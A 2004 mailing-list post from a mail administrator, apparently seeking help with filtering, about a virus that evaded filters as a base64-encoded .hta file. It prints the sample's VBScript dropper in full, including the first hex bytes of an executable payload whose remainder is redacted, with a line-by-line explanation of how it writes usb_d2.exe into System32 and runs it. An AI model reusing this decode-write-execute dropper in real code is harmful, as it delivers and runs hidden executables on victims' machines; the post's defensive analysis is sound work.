[Mimedefang] base64-encoded vbscript .hta file with self-extracting embedded virus
Royce Williams
royce.williams at acsalaska.net
Wed Jan 21 17:34:02 EST 2004
Our customer base got hit today with a virus that slipped through
via some wily obfuscation that I hadn't seen before. What it does,
in a nutshell, is a base64-encoded .hta file that has VBScript in it
to convert a long string of hex into a binary, store it in your
system32 directory, and run it. Full explication below (courtesy
of a VB guy in my office).
I'm running MIMEDefang 2.37, spamassassin 2.61,
clamav 0.60 and File::Scan 0.78, on FreeBSD 4.8.
Did I miss a thread on this, or has anyone seen it?
1. szBinary =
"4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000
E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D"
[ rest of hex redacted]
2. set WshShell = CreateObject("WScript.Shell")
3. set WshEnv = WshShell.Environment("Process")
4. szApplication = WshEnv("SystemRoot")&"\System32\usb_d2.exe"
5. Set hFSO = CreateObject("Scripting.FileSystemObject")
6. Set hFile = hFSO.CreateTextFile(szApplication, true)
7. intLength = len(szBinary)
8. intPosition = 1
9. while intPosition < intLength
10. char = Int("&H" & Mid(szBinary, intPosition, 2))
11. hFile.Write(Chr(char))
12. intPosition = intPosition+2
13. wend
14. hFile.Close
15. Set hShell=CreateObject("WScript.Shell")
16. hShell.run(szApplication)
1. Stores the hex values in a text string
2. Fires up the DOS shell
3. Find out if where your system folder is
4. create a "text" file in your system32 folder named "usb_d2.exe"
(could be randomized)
5. Fire up the FileSystem Object (to manipulate files)
6. open the "text" file for writing (the true)
7. find out how long the string is
8. set the position to the first character
9. while not end-of-string
10. find the hex value of the next two charcters
11. write the character that is represented by the hex value to the
text file
12. go to the next set of hex characters
13. end while loop
14. close the file
15. open the DOS shell again (sloppy code, they can reuse the first one)
16. execute the file
-royce
More information about the MIMEDefang
mailing list